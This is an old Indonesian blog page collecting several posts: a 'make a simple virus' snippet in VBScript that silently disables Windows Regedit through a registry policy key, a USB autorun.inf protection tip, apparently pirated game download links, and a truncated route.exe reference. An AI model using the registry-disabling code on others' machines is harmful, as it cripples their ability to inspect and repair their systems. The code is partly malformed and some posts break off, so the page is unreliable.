Selasa, 09 Februari 2010

Membuat Virus Sederhana

Bookmark and Share

1. mendisable regedit. Yang kita tulis:
On Error Resume Next(perintah ini digunakan pada file vb
supaya kalo ada yang salah bisa dilanjutin kode selanjutnya)
CreateObject("WScript.Shell").run "cmd.exe /c reg add hkcusoftware\microsoft\windows\currentversion\policies\system /v
disableregistrytools /t reg_dword /d ""1"" /f", vbhide

sebenarnya banyak cara untuk mendisable regedit. misalnya kek gini:
CreateObject("WScript.Shell").regwriteHKEY_CURRENT_USERsoftware\microsoft\windows\currentversion\policies\systemdisableregistrytools", 1, "REG_DWORD"


Minggu, 07 Februari 2010

30 Situs Paling Berbahaya Di Dunia

Bookmark and Share

Berhati-hatilah dalam browsing atau membuka situs-situs tertentu yang belum jelas. Karena di dalamnya bisa mengandung virus-virus berbahaya yang akan meugikan kita. Berikut adalah situs paling kotor di dunia, di situs tersebut banyak terdapat bermacam-macam virus yang menyebabkan hp/pc anda rusak. Silakan menyimak :

Tips Agar Flashdisk Kebal dari Virus

Bookmark and Share

Bingung dengan flashdisk Anda yang sering terkena virus?

Anda bisa mencegah flashdisk Anda terkena virus dengan melakukan beberapa trik mudah berikut ini :
1. Masukkan flashdisk ke port komputer atau laptop
2. Buat satu folder di drive flashdisk Anda.
3. Beri nama folder tersebut dengan nama autorun.inf
4. Buka folder tersebut, dan buat aplikasi Notepad di dalamnya di Start->All Programs->Accessories
5. Beri nama file sembarang untuk file Notepad tersebut
6. Buka program Character Map di Start->All Programs->Accessories->System Tools
Pilih huruf yang berlabel Unicode, seperti Arial Unicode atau Lucida Sans Unicode, atau huruf Jepang, China dan karakter aneh lainnya.
7. Pilih beberapa karakter, bisa 4 atau 5 buah, lalu tekan Ctrl+C untuk copy karakter aneh tersebut
8. Rename file Notepad tersebut atau tekan F2 , dan paste karakter aneh yang sudah di-copy tadi untuk mengganti nama file Notepad tersebut
9. Nama file Notepad akan berganti menjadi karakter aneh atau kotak-kotak, dan selesai.

Dalam system operasi Windows, tidak diperbolehkan terdapat 2 nama file yang sama, sehingga kemungkinan besar virus tidak bisa memakai nama file autorun.inf tersebut. Jikalau virus ingin menggantinya, rata-rata virus belum mengenal karakter Unicode, sehingga tampak sulit untuk mengubahnya, dan flashdisk Anda pun aman dari virus.

Sabtu, 05 Desember 2009

Counter-Strike Portable

Bookmark and Share


Counter-Strike: Source is an enhanced version of one of the most cherished of production in recent years. The game was initially only be extended modem to the first part of the famous Half-Life'a. After the huge success of this programme was decided, inter alia, on a boxed edition of Counter-Strike'a, this game doczekala are also many other versions, inter alia, for the Xbox. The product is primarily a visual changes, the game mechanics remained largely unchanged.
(LAN ONLY)

























DownLoad
Code:
http://rapidshare.com/files/314104817/Portable_Counter-Strike_SourceX_By_philly93.part1.rar
http://rapidshare.com/files/314118517/Portable_Counter-Strike_SourceX_By_philly93.part2.rar






Route.exe

Bookmark and Share

Manipulate network routing tables. Route packets of network traffic from one subnet to another by modifying the route table.
Syntax

Display route details:
ROUTE [-f] PRINT [destination_host] [MASK subnet_mask_value] [gateway]
[METRIC metric] [IF interface_no.]

Add a route:
ROUTE [-f] [-p] ADD [destination_host] [MASK subnet_mask_value] [gateway]
[METRIC metric] [IF interface_no.]

Change a route:
ROUTE [-f] CHANGE [destination_host] [MASK subnet_mask_value] [gateway]
[METRIC metric] [IF interface_no.]

Delete a route:
ROUTE [-f] DELETE [destination_host] [MASK subnet_mask_value] [gateway]
[METRIC metric] [IF interface_no.]

key
-f Clear (flush) the routing tables of all gateway entries. If this is
used in conjunction with one of the commands, the tables are
cleared prior to running the command.

destination_host
The address (or set of addresses) that you want to reach.

-p Create a persistent route - survives system reboots.
(not supported in Windows 95)

subnet_mask_value
The su

Followers


junkelse by Junkelse. Powered by Blogger and Supported by kuchino.blogspot.com